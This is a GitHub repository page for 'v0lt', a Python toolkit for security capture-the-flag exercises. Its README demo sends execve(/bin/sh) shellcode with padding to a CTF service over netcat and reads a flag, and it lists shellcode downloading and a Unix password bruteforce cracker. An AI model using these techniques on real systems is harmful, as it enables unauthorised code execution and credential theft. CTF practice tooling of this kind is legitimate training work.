Skip to content

cankuxiaomu/v0lt

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

157 Commits
v0lt
v0lt
 
 
v0ltlib
v0ltlib
 
 
.gitignore
.gitignore
 
 
AUTHORS
AUTHORS
 
 
COPYRIGHT
COPYRIGHT
 
 
README.md
README.md
 
 
setup.py
setup.py
 
 

Repository files navigation

v0lt

v0lt

v0lt is an attempt to regroup every tool I used/use/will use in security CTF, Python style. A lot of exercises were solved using bash scripts but Python may be more flexible, that's why. Nothing to do with Gallopsled. It's a toy toolkit, with small but specific utils only.

##Requirements and Installation ####Dependencies:

  • Libmagic
  • Python3
    • BeautifulSoup
    • Requests
    • filemagic
    • hexdump
    • passlib

####Installation:

# for v0lt install
git clone https://github.com/P1kachu/v0lt.git
cd v0lt
[sudo] python3 setup.py install # sudo is required for potentially missing dependencies

##Demo: Shellcodes

>>> from v0lt import *
>>> nc = Netcat("archpichu.ddns.net", 65102)
Connected to port 65102
>>> print(nc.read())
GIVE ME SHELLCODZ
>>> shellhack = ShellCrafter(4096, "bin","execve")
>>> shellhack.get_shellcodes(shellhack.keywords)

...<SNIPPED>...
85: Linux/x86:setuid(0) & execve(/sbin/poweroff -f) - 47 bytes
86: Linux/x86:execve (/bin/sh) - 21 Bytes
87: Linux/x86:break chroot execve /bin/sh - 80 bytes
88: Linux/x86:execve(/bin/sh,0,0) - 21 bytes
...<SNIPPED>...

Selection: 86
Your choice: http://shell-storm.org/shellcode/files/shellcode-752.php
Shellcode: "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62[...]"

>>> nc.shellcat(shellhack.shellcode)
>>> nc.writeln(shellhack.pad())
>>> exploit = nc.dialogue("cat flag", 3)
>>> print(exploit)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:
File name too long
P1kaCTF{sh3llc0de_1s_e4zY}

##Implemented:

  • Crypto

    • Base64
    • Ceasar shift
    • Hashing functions (SHA, MD5)
    • Bits manipulations (XOR, inverse XOR)
    • Usual conversions (bytes, strings, hex)
    • RSA basics (inverse modulo, inverse power, egcd...)
    • Bruteforcing (Dictionnary, custom word)

  • Shellcodes

    • Shellcode selection and download from Shell-storm repo
    • Shellcode formater
    • Shell{cat,net}: Sending shellcode made easy
    • Automatic padding

  • Easy connection support

    • Netcat
    • Telnet

And more Examples are available here

Changelog

Only includes major features and changes. Bugfixes and minor changes are omitted.

1.4

  • ShellHack becomes ShellCrafter
  • Better ShellCrafter shellcode recovering
  • Add docstrings
  • Refactoring
  • Delete Hexeditor and linux_utils (not good)

1.3

  • Lots of fixes again
  • Hexeditor (Dump/Rewrite files)
  • Unix password bruteforce cracker

1.2

  • Lots of documentation/bugs/framework fixes
  • Added bruteforce
  • Added linux utils
  • Began hexeditor
  • Shellhack fixes
  • Alert messages

1.0

  • Lots of documentation fixes
  • Lots of bugfixes
  • Added shellhack (shellcodes stuff)
  • Added crypto utils
  • Added network utils
  • Fixed project tree

About

Security CTF Toy Tools

Resources

Readme

License

MIT license
Activity

Stars

0 stars

Watchers

2 watching

Forks

0 forks
Report repository

Releases

1 tags

Packages

No packages published

Languages

  • Python 100.0%